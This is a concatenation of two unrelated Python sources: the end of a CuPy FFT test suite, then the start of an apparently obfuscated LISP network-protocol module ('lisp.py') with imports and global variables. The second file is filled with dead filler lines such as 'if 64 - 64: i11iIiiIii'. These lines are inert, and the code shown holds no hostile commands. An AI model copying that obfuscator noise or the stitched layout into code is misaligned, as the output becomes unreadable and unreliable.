'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftOrder(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft alway returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.gpu
class TestDefaultPlanType(unittest.TestCase):
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd CUFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
@testing.gpu
@testing.slow
class TestFftAllocate(unittest.TestCase):
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in six.moves.range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft2(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': [-1, -2], 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The CUFFT plan and a.shape do not match' in str(ex.value)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFft(unittest.TestCase):
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1), 'norm': None},
)
@testing.gpu
class TestFftnContiguity(unittest.TestCase):
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfft(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.n is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfft2(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.s is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestRfftn(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestHfft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftfreq(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftshift(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading(unittest.TestCase):
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
lisp_print_rloc_probe_list = False
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
lisp_registered_count = 0
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
lisp_crypto_ephem_port = None
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
lisp_pitr = False
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
lisp_l2_overlay = False
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
lisp_register_all_rtrs = True
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
if 83 - 83: OoooooooOO
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
